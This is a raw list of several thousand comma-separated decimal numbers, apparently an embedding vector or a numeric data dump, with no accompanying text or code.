-0.004177561495453119, 0.004440537188202143, 0.027139121666550636, 0.0035670814104378223, -0.006856159772723913, 0.006014636717736721, 0.0141481077298522, 0.014335948042571545, 0.00352763500995934, -0.006717158015817404, 0.0315571166574955, 0.007573708426207304, -0.017401495948433876, 0.0019046975066885352, -0.022540798410773277, -0.017100952565670013, 0.023367295041680336, 0.026973823085427284, -0.0021714302711188793, -0.01762690395116806, -0.012915877625346184, -0.007243109866976738, 0.010932287201285362, -0.004061100538820028, 0.022480690851807594, 0.012690469622612, -0.012915877625346184, 0.009850328788161278, -0.02629759907722473, 0.055209930986166, -0.01944519579410553, -0.0009636191534809768, 0.006040934007614851, 0.010008114390075207, -0.012472575530409813, -0.0034656478092074394, 0.012630361132323742, -0.022044900804758072, -0.027695128694176674, 0.007318246178328991, -0.011398131027817726, -0.034141797572374344, -0.011841433122754097, -0.020557207986712456, 0.008866047486662865, 0.005120518151670694, 0.009339404292404652, -0.018152857199311256, 0.004380428697913885, -0.021413758397102356, -0.007318246178328991, 0.006852402817457914, 0.004361644387245178, 0.008264959789812565, -0.018814053386449814, 0.00867820717394352, -0.013261503539979458, -0.004455564543604851, -0.025486130267381668, -0.021954737603664398, 0.014215730130672455, -0.03501337394118309, -0.0022465663496404886, -0.003576473332941532, -0.02763501927256584, -0.0022559582721441984, -0.005015327595174313, -0.02544104866683483, -0.01313377171754837, -0.01618429273366928, -0.009609893895685673, -0.043368496000766754, 0.0038187869358807802, 0.010706879198551178, 0.08132719993591309, 0.017687013372778893, -0.0043879421427845955, -0.008325068280100822, -0.020346827805042267, 0.0021714302711188793, 0.021579058840870857, -0.00019676238298416138, 0.019520331174135208, -0.008535449393093586, 0.022691071033477783, -0.010233522392809391, -0.0016877423040568829, 0.0014811183791607618, -0.01080455631017685, -0.003155711805447936, -0.015417906455695629, -0.01875394396483898, -0.0061198268085718155, 0.008362635970115662, -0.006874943617731333, 0.00862561259418726, 0.014598923735320568, -0.03522375598549843, -0.0028044511564075947, -0.014531301334500313, 0.011292940005660057, -0.010594175197184086, -0.028521623462438583, -0.004872569348663092, 0.013449342921376228, -0.01251765713095665, -0.010248550213873386, 0.014478706754744053, 0.026177380234003067, 0.005364709999412298, 0.006142367608845234, 0.01607910357415676, -0.006303910166025162, -0.0033078622072935104, 0.004384185187518597, -0.014185676351189613, -0.002254079794511199, -0.015072280541062355, 0.025426020845770836, -0.012044300325214863, 0.004812460392713547, -0.014396056532859802, -0.017671985551714897, -0.0012998527381569147, -0.015898777171969414, -0.013186367228627205, 0.020617317408323288, 0.0262374896556139, -0.0037474078126251698, 0.015853695571422577, -0.0050904639065265656, -0.0024700958747416735, -0.004519429989159107, -0.03137679025530815, 0.022721124812960625, -0.008685721084475517, -0.015478014945983887, 0.020857753232121468, 0.000032637199183227494, -0.019775794818997383, 0.004541970789432526, 0.012818200513720512, 0.0014163135783746839, 0.024779850617051125, 0.01992606557905674, -0.02506536804139614, 0.00897123757749796, -0.010135846212506294, -0.0007123831892386079, 0.018874162808060646, -0.019294923171401024, 0.0015590719413012266, 0.007656358182430267, -0.004680972546339035, 0.003937126137316227, 0.007660114672034979, -0.00619871960952878, 0.013051122426986694, -0.01628948375582695, 0.01807771995663643, -0.00028222959372214973, -0.030715595930814743, -0.0066495356149971485, -0.005428575910627842, 0.025591319426894188, 0.01752171479165554, 0.01725122518837452, 0.011127641424536705, 0.010346226394176483, 0.015162443742156029, 0.0020174013916403055, -0.025110449641942978, -0.010616715997457504, -0.016124185174703598, 0.015688395127654076, -0.024734769016504288, 0.017401495948433876, 0.028822168707847595, -0.030640458688139915, 0.014839359559118748, -0.011766296811401844, 0.012187059037387371, 0.005838066805154085, -0.008099660277366638, -0.03495326638221741, -0.00881345197558403, 0.002011766191571951, -0.027830373495817184, 0.002064361469820142, -0.01513990294188261, 0.024629579856991768, 0.027109067887067795, 0.0015083551406860352, -0.008708261884748936, -0.02410362847149372, -0.003653487889096141, 0.019279897212982178, -0.01513990294188261, -0.006871186662465334, 0.008828479796648026, -0.013599615544080734, -0.03408168628811836, 0.0401226207613945, 0.009805247187614441, 0.013629669323563576, 0.039761967957019806, 0.006364018656313419, 0.004436780698597431, 0.03474288433790207, -0.0282962154597044, 0.024839960038661957, 0.006495506968349218, 0.017025817185640335, -0.010173413902521133, 0.016605054959654808, 0.021353650838136673, 0.020151473581790924, 0.012577765621244907, 0.01636461913585663, -0.021248459815979004, 0.00876085739582777, 0.00809214636683464, -0.001209689537063241, 0.019865958020091057, -0.013201394118368626, -0.027214257046580315, -0.0029227903578430414, 0.01930995099246502, 0.006769753061234951, 0.00027823797427117825, 0.011894028633832932, -0.04201604798436165, -0.024148710072040558, 0.006281369365751743, 0.028251133859157562, 0.03209809586405754, -0.0032965918071568012, -0.008903615176677704, -0.0045044030994176865, 0.015928830951452255, 0.003508850932121277, -0.04393953084945679, -0.025350885465741158, -0.01979082077741623, 0.03588495030999184, 0.017641931772232056, -0.014839359559118748, 0.0012397438986226916, -0.010105791501700878, 0.027529828250408173, -0.030024344101548195, -0.011067532002925873, 0.013344152830541134, -0.00824993196874857, -0.0000966788938967511, 0.025591319426894188, -0.012630361132323742, 0.0018145343055948615, 0.004846271593123674, -0.024374118074774742, 0.024148710072040558, -0.01423075795173645, -0.020872779190540314, -0.0062926397658884525, 0.014997145161032677, 0.02308177761733532, -0.018498482182621956, -0.012036786414682865, -0.0308658666908741, 0.007539897225797176, 0.005518739111721516, -0.0004841575864702463, -0.026417816057801247, -0.0018305006669834256, 0.002334851073101163, -0.004635890945792198, -0.013404261320829391, 0.004838758148252964, 0.012630361132323742, -0.014651519246399403, 0.020016228780150414, 0.016755327582359314, -0.01601899415254593, -0.00846782699227333, -0.01690559834241867, -0.0018474062671884894, 0.001525260740891099, 0.003629068611189723, 0.00748354522511363, 0.0066495356149971485, 0.006067231763154268, -0.02102305181324482, 0.005973311606794596, -0.003131292527541518, 0.0013223935384303331, -0.010143359191715717, 0.006563129369169474, -0.0046020797453820705, -0.020316774025559425, -0.009504703804850578, 0.02894238568842411, -0.011097586713731289, -0.0005963919684290886, 0.004853785503655672, 0.003366092685610056, -0.009046373888850212, 0.03233853355050087, 0.0064917500130832195, -0.002815721556544304, -0.009594867005944252, -0.01690559834241867, -0.011691161431372166, 0.007359570823609829, -0.012329816818237305, -0.009016319178044796, -0.0015337135409936309, -0.022555826231837273, 0.0031331710051745176, -0.008610584773123264, -0.0002512359933461994, 0.012983500026166439, 0.002269107149913907, 0.002009887946769595, 0.030430078506469727, -0.0072957053780555725, -0.004136236384510994, 0.0029509663581848145, 0.0034374718088656664, -0.0022916479501873255, 0.00936194509267807, 0.013456856831908226, -0.0011786959366872907, 0.023307185620069504, -0.002626002999022603, 0.007896793074905872, -0.0003458603750914335, -0.026012081652879715, 0.003221455728635192, -0.025395967066287994, 0.04381931200623512, -0.008310041390359402, -0.01628948375582695, -0.005860607605427504, 0.0053496831096708775, -0.005011571105569601, 0.0060935295186936855, 0.002875830279663205, 0.0018877919064834714, 0.0034036606084555387, 0.002409987151622772, -0.012682955712080002, -0.019024433568120003, -0.03206804394721985, 0.0009584535728208721, 0.003426201408728957, 0.044420402497053146, -0.00949718989431858, -0.010263577103614807, -0.005402278155088425, -0.002763126278296113, -0.015523096546530724, -0.012299762107431889, -0.02228533662855625, -0.007415922824293375, 0.007934360764920712, -0.00034562559449113905, 0.0015928831417113543, -0.004106182139366865, 0.01947524957358837, 0.014771737158298492, 0.0027537343557924032, 0.0300093162804842, -0.0023310943506658077, -0.0077089532278478146, 0.02215009182691574, 0.014801790937781334, 0.003450620686635375, 0.01693565398454666, 0.0064917500130832195, 0.022315390408039093, 0.013787454925477505, -0.00996303278952837, 0.0060935295186936855, -0.007430950179696083, 0.023758001625537872, -0.020632345229387283, -0.01979082077741623, -0.021954737603664398, 0.008565503172576427, 0.012637874111533165, -0.01035374030470848, 0.01752171479165554, 0.011721215210855007, -0.007096594665199518, 0.017611877992749214, 0.02222522720694542, -0.02321702241897583, -0.01191656943410635, -0.005789228715002537, -0.002612854354083538, 0.02276620641350746, 0.014824331738054752, -0.00924172718077898, -0.020992998033761978, 0.02215009182691574, 0.005139301996678114, -0.002569650998339057, 0.00491389399394393, -0.011202776804566383, -0.007107865065336227, -0.008497880771756172, 0.016830462962388992, -0.005871878005564213, -0.024163736030459404, -0.004846271593123674, -0.008287500590085983, -0.009083941578865051, -0.011375590227544308, 0.012217112816870213, -0.012367384508252144, 0.031466953456401825, 0.03423196077346802, -0.008445286191999912, -0.018047666177153587, -0.020136447623372078, 0.009474649094045162, -0.0024062301963567734, 0.023367295041680336, -0.007573708426207304, 0.002742463955655694, -0.007964415475726128, -0.00994800589978695, 0.013208908028900623, -0.0018643118673935533, -0.016169266775250435, 0.015162443742156029, 0.0012190815759822726, -0.0017938718665391207, -0.00012773119669873267, 0.022345446050167084, -0.014734168536961079, -0.022210201248526573, 0.004493132699280977, 0.0014679695013910532, 0.005608902312815189, -0.004835001192986965, -0.007171730976551771, -0.015583205968141556, 0.002731193555518985, 0.028506597504019737, 0.006228773854672909, -0.010797042399644852, -0.008415231481194496, 0.02300664223730564, 0.0016933775041252375, 0.00044400678598321974, 0.0132915573194623, -0.011480780318379402, -0.034412287175655365, 0.014035403728485107, -0.012893336825072765, 0.015177471563220024, 0.01393772754818201, -0.012036786414682865, 0.016229374334216118, -0.01409551315009594, -0.010721907019615173, 0.04399963840842247, 0.00864063948392868, 0.011105100624263287, 0.004237669985741377, 0.00042310956632718444, -0.02671835944056511, 0.013569560833275318, 0.029543474316596985, -0.004068613983690739, -0.017671985551714897, 0.018092747777700424, 0.011285427026450634, -0.02153397724032402, -0.017311332747340202, -0.007600006181746721, 0.04769632965326309, -0.02774021029472351, 0.01628948375582695, -0.008422745391726494, 0.02208998240530491, -0.011300453916192055, -0.009151563979685307, 0.00014651518722530454, -0.007799116428941488, -0.0021939710713922977, -0.012758092023432255, 0.014433625154197216, 0.0059770685620605946, 0.003078697482123971, -0.0010584783740341663, -0.034893155097961426, 0.015628287568688393, 0.010857151821255684, 0.001581612741574645, -0.03696690872311592, -0.0006147063686512411, 0.026012081652879715, -0.00476737879216671, 0.013419289141893387, 0.016514891758561134, -0.00690875481814146, 0.008099660277366638, -0.020827697589993477, -0.010609203018248081, 0.002148889470845461, 0.0006334903882816434, -0.006510533858090639, 0.0006734063499607146, 0.007152946665883064, 0.00961740780621767, -0.0010979247745126486, 0.0204069372266531, -0.012562738731503487, -0.003937126137316227, -0.0005376919871196151, -0.011533375829458237, 0.001711222343146801, 0.030400024726986885, -0.005586361512541771, -0.005526252556592226, 0.010406335815787315, 0.004128722939640284, 0.0009124327334575355, 0.01618429273366928, -0.006852402817457914, 0.0041888318955898285, 0.009422053582966328, 0.010346226394176483, -0.01411054003983736, 0.021113215014338493, -0.004384185187518597, 0.019114596769213676, 0.0003921159659512341, 0.0028777087572962046, -0.024629579856991768, 0.00011704779171850532, -0.02733447588980198, 0.022420581430196762, 0.004094911739230156, 0.024223845452070236, 0.00534216919913888, -0.007716466672718525, -0.0071642170660197735, -0.0265831146389246, -0.018633726984262466, 0.013757401145994663, 0.007716466672718525, 0.0048612989485263824, 0.008272472769021988, -0.003508850932121277, -0.0016633231425657868, -0.0014050431782379746, 0.02177441120147705, 0.0021714302711188793, 0.026658251881599426, 0.003967180382460356, 0.011848947033286095, -0.008655666373670101, -0.0028908574022352695, -0.00474859494715929, -0.0005555367679335177, 0.02688365988433361, 0.008452799171209335, -0.008610584773123264, 0.004632133990526199, 0.02009136602282524, -0.003362335730344057, 0.010368767194449902, -0.008573017083108425, 0.016725271940231323, -0.01341177523136139, 0.005481170956045389, 0.010706879198551178, -0.008565503172576427, 0.004121209494769573, 0.013960268348455429, -0.0233222134411335, 0.011766296811401844, 0.004842515103518963, 0.0014989631017670035, 0.03263907507061958, 0.0011984191369265318, 0.006683346815407276, -0.009835301898419857, 0.01051152590662241, -0.00632645096629858, 0.00014933278725948185, -0.003850719891488552, 0.008963724598288536, 0.029859045520424843, -0.019219787791371346, 0.00889610219746828, 0.004226399585604668, -0.01834820955991745, 0.00649926345795393, -0.014012862928211689, 0.00023292159312404692, 0.006904997862875462, 0.00043602357618510723, -0.002997926203534007, -0.03408168628811836, 0.02067742682993412, 0.026898685842752457, 0.01982087641954422, -0.022796262055635452, 0.005984582006931305, -0.015237580053508282, 0.011668620631098747, -0.0031688606832176447, 0.010308658704161644, 0.01452378835529089, -0.019941093400120735, -0.027920536696910858, 0.021564031019806862, -0.01604904793202877, -0.035343971103429794, 0.01882908120751381, 0.0005165599868632853, 0.022405553609132767, -0.009098969399929047, -0.017326360568404198, 0.005943257361650467, 0.020346827805042267, -0.010090764611959457, 0.008407717570662498, -0.019159678369760513, 0.01021849550306797, -0.010541580617427826, 0.0065518589690327644, 0.011616025120019913, 0.013321612030267715, 0.02787545509636402, -0.0016417214646935463, -0.002815721556544304, -0.0019366303458809853, -0.010744447819888592, -0.015523096546530724, -0.002177065471187234, -0.02208998240530491, -0.02891233190894127, -0.006829862017184496, 0.010488985106348991, 0.005635199602693319, 0.0033886334858834743, -0.013486911542713642, 0.010361254215240479, -0.0014153743395581841, 0.006273855455219746, 0.004278995096683502, -0.013674750924110413, -0.02139873243868351, -0.007562438026070595, -0.014027890749275684, 0.00664577865973115, -0.008580530993640423, -0.0384095199406147, 0.00546238711103797, 0.0058793919160962105, 0.010496499016880989, -0.0005649287486448884, -0.005079193506389856, 0.013404261320829391, 0.01239743921905756, -0.02749977447092533, 0.004726054146885872, 0.002131983870640397, 0.008032037876546383, -0.0012228382984176278, 0.0070815677754580975, -0.0036835421342402697, -0.00967000238597393, 0.01807771995663643, 0.009008806198835373, 0.016139211133122444, 0.005143058951944113, -0.024374118074774742, -0.02575661987066269, 0.0024306494742631912, -0.02819102630019188, -0.004068613983690739, 0.014666546136140823, 0.025290776044130325, 0.00020662398310378194, 0.011037478223443031, -0.003074940526857972, 0.00546238711103797, -0.013366693630814552, 0.012562738731503487, 0.008595557883381844, -0.005221951752901077, 0.002609097398817539, 0.008941183798015118, 0.006255071610212326, 0.003970937337726355, 0.0018586766673251987, 0.00948216300457716, 0.0027969374787062407, 0.018558591604232788, 0.020602289587259293, 0.012404953129589558, 0.002317945472896099, -0.004714783746749163, 0.023232050240039825, -0.0070740538649261, 0.019880983978509903, -0.00018196999735664576, -0.009467135183513165, 0.01773209497332573, -0.021038079634308815, 0.017311332747340202, 0.017100952565670013, -0.024809906259179115, -0.0028175998013466597, 0.014989631250500679, -0.020076338201761246, -0.0009777070954442024, 0.008189823478460312, 0.032248370349407196, 0.015928830951452255, 0.007994470186531544, 0.010699366219341755, -0.005973311606794596, -0.0325789675116539, -0.015628287568688393, -0.019640550017356873, 0.006642022170126438, 0.020181529223918915, 0.026462897658348083, 0.005819282960146666, -0.006495506968349218, -0.004478105343878269, -0.0037605566903948784, 0.007934360764920712, -0.011999218724668026, -0.007581221871078014, 0.010797042399644852, 0.026913713663816452, 0.007213055621832609, 0.01786733977496624, 0.009850328788161278, -0.0035257565323263407, -0.000057907545851776376, 0.00014005819684825838, -0.010624229907989502, -0.003822543891146779, -0.01947524957358837, -0.0007015823503024876, 0.013501938432455063, 0.009752652607858181, -0.00764884427189827, 0.017807230353355408, -0.007318246178328991, -0.016439756378531456, -0.009737624786794186, -0.0023592703510075808, 0.008302527479827404, -0.005657740402966738, 0.011646079830825329, 0.0019366303458809853, 0.0141481077298522, -0.01677035354077816, -0.004534457344561815, -0.00803955178707838, -0.01178132463246584, 0.025531211867928505, -0.01135304942727089, 0.014666546136140823, 0.011187749914824963, 0.005120518151670694, -0.0007823535706847906, 0.008618098683655262, -0.032218314707279205, 0.009557298384606838, 0.004143750295042992, 0.010368767194449902, 0.015493042767047882, -0.0141481077298522, 0.02517055906355381, 0.0011984191369265318, -0.004992786794900894, 0.009219186380505562, 0.009857842698693275, 0.023427404463291168, -0.002828870201483369, 0.004650918301194906, 0.019249841570854187, -0.007716466672718525, 0.004200102295726538, 0.020857753232121468, 0.014335948042571545, -0.009098969399929047, 0.003439350286498666, -0.016965707764029503, -0.001955414190888405, 0.001121404697187245, 0.008355122990906239, 0.027920536696910858, 0.009121510200202465, 0.004241426941007376, 0.020121419802308083, -0.025215640664100647, -0.000025637224098318256, -0.003985964693129063, -0.0035464190877974033, -0.017161061987280846, -0.02781534567475319, 0.007889279164373875, 0.007723980583250523, 0.024960177019238472, -0.001460455940105021, -0.015252606943249702, -0.0072957053780555725, -0.0006132975686341524, -0.0018840350676327944, 0.011848947033286095, -0.010999909602105618, 0.01776214875280857, -0.010616715997457504, 0.02270609885454178, 0.0010988638969138265, 0.0032590238843113184, -0.02139873243868351, -0.004556998144835234, -0.007246866822242737, 0.007889279164373875, 0.015688395127654076, -0.013276530429720879, 0.011225317604839802, 0.017446577548980713, 0.0195503868162632, -0.008595557883381844, 0.008234905079007149, 0.017807230353355408, -0.008032037876546383, -0.01722116954624653, 0.01947524957358837, -0.004124965984374285, -0.010030655190348625, 0.005304601509124041, 0.01789739355444908, 0.011262886226177216, 0.01047395821660757, -0.006127340719103813, 0.008234905079007149, -0.01663510873913765, -0.006202476564794779, -0.006615724414587021, 0.0031594685278832912, -0.006364018656313419, -0.001516807940788567, 0.015763532370328903, 0.006950079463422298, -0.00748354522511363, 0.0103762811049819, 0.005980825517326593, 0.020151473581790924, -0.007190514821559191, 0.006371532566845417, -0.029167793691158295, -0.008986265398561954, 0.002409987151622772, 0.00008159299613907933, -0.011338021606206894, 0.014118053950369358, 0.004042316693812609, 0.007539897225797176, -0.002156403148546815, -0.001642660703510046, -0.013960268348455429, -0.005995852407068014, -0.006142367608845234, 0.025606347247958183, 0.00924172718077898, -0.00982778798788786, 0.0006593183497898281, 0.013764914125204086, 0.015853695571422577, -0.0035257565323263407, 0.017882367596030235, -0.01625942997634411, 0.0013843807391822338, 0.0005367527483031154, 0.017266251146793365, -0.02287139743566513, 0.005901932716369629, 0.02166922204196453, 0.010383795015513897, 0.0146590331569314, -0.010699366219341755, 0.011691161431372166, -0.0229765884578228, 0.0034243229310959578, -0.012765605933964252, 0.02901752106845379, -0.03113635629415512, -0.005815526004880667, -0.016995761543512344, -0.019039461389183998, -0.01483184564858675, 0.025936946272850037, 0.0015421663410961628, -0.008167282678186893, 0.01636461913585663, 0.009504703804850578, -0.020151473581790924, 0.0036835421342402697, -0.018498482182621956, -0.025906890630722046, 0.0002008713927352801, 0.02273615263402462, 0.012006732635200024, -0.005045382305979729, 0.01286328211426735, 0.016409700736403465, -0.010323685593903065, 0.0037849757354706526, 0.007333273068070412, -0.00939951278269291, 0.012878309935331345, -0.008084633387625217, 0.02428395487368107, -0.006168665364384651, -0.0003848371852654964, 0.009609893895685673, -0.01513990294188261, -0.012502629309892654, -0.008858533576130867, 0.008648153394460678, 0.02088780701160431, 0.01286328211426735, -0.0021169567480683327, 0.015342770144343376, 0.011338021606206894, -0.0353139191865921, -0.006653292570263147, -0.010992396622896194, 0.015598232857882977, -0.008227391168475151, 0.0010819582967087626, 0.02338232286274433, 0.006972620263695717, -0.00022634718334302306, -0.048297420144081116, 0.004534457344561815, -0.007036486174911261, -0.01076698862016201, 0.010188440792262554, 0.0039145853370428085, 0.009031346999108791, -0.011360562406480312, 0.0014191311784088612, 0.0013684143777936697, -0.0016539311036467552, -0.015763532370328903, 0.008565503172576427, -0.015447961166501045, -0.004654674790799618, -0.02928801067173481, -0.003692934289574623, -0.013434316031634808, 0.029363147914409637, 0.008452799171209335, 0.012021759524941444, 0.009932979010045528, -0.008325068280100822, 0.006416614167392254, 0.016349593177437782, -0.004008505493402481, -0.018468428403139114, -0.0229765884578228, 0.033450543880462646, 0.006258828565478325, -0.001064113574102521, -0.007457247469574213, -0.0008175735711120069, 0.008159768767654896, 0.015417906455695629, 0.004151263739913702, 0.0011589727364480495, 0.009023833088576794, -0.006548102013766766, 0.015192498452961445, 0.00404607318341732, -0.020662399008870125, -0.00004816334694623947, -0.0031951582059264183, -0.0014764223014935851, -0.007404652424156666, 0.010451417416334152, -0.0007922151708044112, 0.011668620631098747, -0.003822543891146779, -0.013321612030267715, 0.030805759131908417, -0.023232050240039825, -0.017777176573872566, -0.01409551315009594, -0.009489675983786583, -0.002208998193964362, -0.008565503172576427, 0.003751164535060525, -0.034171849489212036, -0.00837014988064766, -0.00007754269608994946, 0.005849337205290794, -0.017161061987280846, 0.013006040826439857, -0.009895410388708115, -0.012374898418784142, 0.01227722130715847, -0.021594084799289703, -0.012562738731503487, -0.019520331174135208, -0.004943948704749346, 0.002030550269410014, 0.02578667365014553, -0.001141127897426486, 0.013900158926844597, -0.024404171854257584, -0.01556817814707756, 0.004124965984374285, -0.019294923171401024, -0.005680281203240156, 0.002212755149230361, 0.009489675983786583, 0.012179545126855373, -0.015988940373063087, -0.009752652607858181, -0.02225528284907341, 0.015305202454328537, 0.014373515732586384, -0.0030561566818505526, 0.006672076415270567, -0.010120818391442299, -0.013366693630814552, -0.01092477422207594, 0.00690124137327075, -0.008618098683655262, -0.013066149316728115, 0.023953355848789215, -0.008745829574763775, 0.015508069656789303, 0.011495807208120823, -0.005484927911311388, -0.009136537089943886, 0.001051903935149312, 0.0065518589690327644, -0.013592101633548737, 0.008618098683655262, -0.04430018365383148, -0.01092477422207594, 0.008700747974216938, -0.005481170956045389, -0.029002495110034943, -0.0124350069090724, 0.02270609885454178, -0.010609203018248081, -0.03140684589743614, -0.00403855973854661, 0.01941514201462269, -0.008227391168475151, 0.0228112880140543, -0.027830373495817184, 0.03299972787499428, -0.006957593373954296, -0.0029434526804834604, -0.028686923906207085, -0.019324978813529015, -0.017687013372778893, -0.008550476282835007, 0.01879902556538582, 0.025020286440849304, 0.004406725987792015, -0.007152946665883064, 0.0018427103059366345, -0.008325068280100822, -0.007246866822242737, 0.007754034828394651, 0.0041136955842375755, -0.021473867818713188, -0.0009406087337993085, 0.02190965600311756, -0.007656358182430267, -0.01813782937824726, 0.01800258457660675, -0.010241036303341389, 0.005218194797635078, -0.023712920024991035, 0.01701078936457634, 0.0017581823049113154, 0.020316774025559425, -0.019294923171401024, 0.004688485991209745, -0.005082949995994568, -0.0028532894793897867, -0.0023123102728277445, -0.016514891758561134, 0.00862561259418726, 0.021549003198742867, 0.002492636675015092, 0.006912511773407459, 0.006953836418688297, 0.011292940005660057, -0.013862591236829758, 0.0037924894131720066, -0.011698674410581589, 0.009932979010045528, -0.02054218202829361, 0.004203858785331249, -0.004309049341827631, 0.013501938432455063, 0.0072205690667033195, -0.008535449393093586, -0.008295013569295406, -0.02174435742199421, -0.005864364560693502, 0.020076338201761246, 0.003264659084379673, 0.0070815677754580975, -0.019024433568120003, -0.020587263628840446, 0.005439846310764551, -0.005353439599275589, 0.0035032157320529222, -0.0034694045316427946, -0.005680281203240156, 0.015267634764313698, -0.008400204591453075, -0.032458748668432236, -0.006739698816090822, -0.0024325279518961906, 0.027003876864910126, -0.0029340607579797506, -0.026012081652879715, 0.026432843878865242, -0.0124350069090724, 0.021969765424728394, 0.02123343199491501, 0.006657049059867859, -0.011420671828091145, -0.005875634960830212, -0.0006325511494651437, -0.004331590142101049, -0.018648754805326462, -0.01765695959329605, 0.021654194220900536, 0.002124470192939043, -0.0004341451858635992, 0.004463077988475561, 0.007464761380106211, -0.002391203073784709, 0.001307366299442947, -0.00462086359038949, 0.0076526012271642685, -0.010316172614693642, 0.029889099299907684, 0.005124275106936693, -0.011022450402379036, 0.006401586811989546, -0.011811378411948681, -0.010158387012779713, 0.00924172718077898, -0.0001530895970063284, 0.005300844553858042, 0.021999819204211235, 0.00046866078628227115, -0.024990232661366463, -0.00617993576452136, 0.0037173533346503973, 0.01690559834241867, 0.005740390159189701, -0.01220959983766079, 0.029363147914409637, -0.02407357282936573, -0.003212063806131482, -0.00012690939183812588, -0.0021150782704353333, 0.0028589246794581413, 0.00833258219063282, 0.00294533115811646, -0.009812761098146439, 0.028506597504019737, 0.008347609080374241, -0.011428184807300568, 0.015365310944616795, 0.006844889372587204, -0.02009136602282524, -0.0018201695056632161, -0.009459622204303741, 0.023232050240039825, -0.016169266775250435, -0.006660806015133858, 0.002626002999022603, -0.029603581875562668, 0.010797042399644852, 0.03260902315378189, -0.014756709337234497, 0.0012820078991353512, -0.013960268348455429, -0.009407026693224907, 0.015928830951452255, -0.006942566018551588, -0.005436089355498552, -0.003116265404969454, 0.006630751769989729, -0.014771737158298492, -0.021969765424728394, -0.015613259747624397, -0.014704114757478237, -0.014208217151463032, 0.0004195875662844628, -0.014065458439290524, 0.012029273435473442, 0.005545036401599646, 0.004008505493402481, 0.011646079830825329, 0.032488804310560226, -0.030264779925346375, 0.0016492351423949003, 0.010428876616060734, 0.000538161548320204, -0.00474108150228858, -0.001055660773999989, -0.01438854355365038, 0.006397829856723547, 0.006255071610212326, -0.00516935670748353, -0.010421362705528736, 0.00032942439429461956, 0.012442520819604397, 0.022721124812960625, 0.005627686157822609, -0.03230847790837288, 0.014613951556384563, 0.0031049950048327446, -0.005511225201189518, -0.00001526199957879726, 0.0025546238757669926, -0.005676524713635445, -0.02266101725399494, 0.030159588903188705, 0.008527935482561588, 0.017641931772232056, -0.013013554736971855, -0.007464761380106211, -0.022165119647979736, 0.00632645096629858, -0.0031744958832859993, -0.004632133990526199, 0.0059357439167797565, -0.047245513647794724, -0.018949298188090324, 0.000821330351755023, 0.0031989149283617735, -0.013900158926844597, 0.010992396622896194, -0.014756709337234497, -0.009121510200202465, -0.0059056892059743404, 0.0097751934081316, 0.025155531242489815, 0.019159678369760513, -0.0028532894793897867, 0.010278603993356228, 0.009429567493498325, 0.00028575159376487136, 0.0005334655870683491, 0.013396748341619968, 0.000396577175706625, 0.007119135465472937, 0.0023930815514177084, -0.00589817576110363, -0.0007955023320391774, -0.006209990009665489, 0.0038695037364959717, 0.00617993576452136, 0.005849337205290794, 0.0032458750065416098, -0.013749887235462666, -0.005150572396814823, 0.017266251146793365, -0.020557207986712456, 0.009978060610592365, 0.0018577375449240208, -0.0029509663581848145, 0.007836684584617615, -0.0002981959842145443, -0.004260210786014795, -0.006003366317600012, -0.003176374128088355, 0.013787454925477505, 0.01701078936457634, -0.0198960117995739, -0.0257265642285347, 0.007829170674085617, -0.010624229907989502, 0.024599524214863777, -0.015763532370328903, -0.008144741877913475, 0.0035389054100960493, 0.011390617117285728, 0.004936434794217348, 0.003982207737863064, 0.012254681438207626, 0.022901451215147972, -0.003831935813650489, -0.009895410388708115, -0.006841132417321205, 0.002366783795878291, 0.000435084366472438, -0.00381127349101007, 0.0077690621837973595, 0.023848164826631546, 0.002727436600252986, -0.008663180284202099, 0.0032308478839695454, -0.007656358182430267, -0.008017010986804962, 0.017687013372778893, -0.002932182280346751, -0.002977263880893588, -0.006521804258227348, 0.016139211133122444, 0.0012153247371315956, 0.0064729661680758, -0.02722928486764431, 0.004515673499554396, -0.01934000477194786, 0.0015074159018695354, 0.01663510873913765, -0.0224656630307436, -0.006104799918830395, 0.002956601558253169, -0.004823730792850256, 0.004000991582870483, -0.019520331174135208, -0.01786733977496624, -0.007077810820192099, 0.01687554456293583, 0.01580861397087574, -0.02308177761733532, 0.028972439467906952, -0.0026917471550405025, 0.0005128031480126083, 0.0059056892059743404, -0.017176087945699692, 0.00041747436625882983, -0.016003966331481934, 0.017822258174419403, 0.006747212260961533, -0.013171340338885784, 0.010594175197184086, -0.009700057096779346, -0.011450725607573986, -0.012697983533143997, -0.00010031829151557758, 0.004714783746749163, 0.003386755008250475, 0.01879902556538582, 0.010135846212506294, 0.017687013372778893, -0.022916479036211967, 0.0036610013339668512, 0.0030880894046276808, -0.023923302069306374, 0.030715595930814743, 0.006029663607478142, 0.00852042157202959, 0.00032472837483510375, 0.012066841125488281, -0.010691852308809757, 0.006758482661098242, 0.01813782937824726, -0.004786163102835417, 0.016439756378531456, 0.0023761759512126446, 0.014080485329031944, 0.00619120616465807, 0.011022450402379036, -0.004004748538136482, 0.009061400778591633, 0.0018746431451290846, 0.003692934289574623, -0.01441859733313322, 0.016995761543512344, 0.02695879526436329, -0.023232050240039825, 0.015147416852414608, -0.006228773854672909, 0.0013364815386012197, -0.0076676285825669765, 0.0016435999423265457, 0.015628287568688393, -0.024975204840302467, -0.00833258219063282, -0.01090223342180252, -0.009902924299240112, 0.019129624590277672, 0.00009409609629074112, 0.01765695959329605, 0.0036797854118049145, 0.005785471759736538, 0.013960268348455429, 0.0014247663784772158, 0.020181529223918915, -0.0011599119752645493, 0.006852402817457914, 0.001590065541677177, 0.00002041292464127764, -0.0068073212169110775, 0.009587353095412254, -0.034382231533527374, -0.006705887615680695, 0.006416614167392254, 0.0018718255450949073, 0.01167613361030817, 0.007656358182430267, 0.004399212542921305, -0.020527154207229614, 0.007949388585984707, 0.0000990268963505514, 0.01033871341496706, 0.0004437719762790948, 0.01885913498699665, 0.019835902377963066, -0.004782406147569418, -0.017341388389468193, -0.006405343767255545, 0.023262104019522667, 0.011593484319746494, -0.019520331174135208, -0.003277807729318738, -0.002496393397450447, -0.007352057378739119, 0.013742373324930668, 0.00889610219746828, 0.023637784644961357, 0.004673459101468325, -0.016965707764029503, 0.028371352702379227, -0.015478014945983887, 0.0012801295379176736, 0.018363237380981445, 0.005158086307346821, 0.0026767197996377945, 0.0002484183933120221, -0.02019655518233776, 0.010038169100880623, 0.009782706387341022, 0.004414239898324013, 0.0018868526676669717, -0.01068433839827776, 0.001246318337507546, -0.0047035133466124535, 0.024945151060819626, -0.008167282678186893, -0.00705527001991868, 0.01594385877251625, -0.03940131515264511, 0.005338412709534168, 0.0011589727364480495, 0.008167282678186893, 0.004827487748116255, -0.017191115766763687, 0.013779941946268082, 0.012713010422885418, 0.005672767758369446, 0.01226219441741705, 0.010226009413599968, 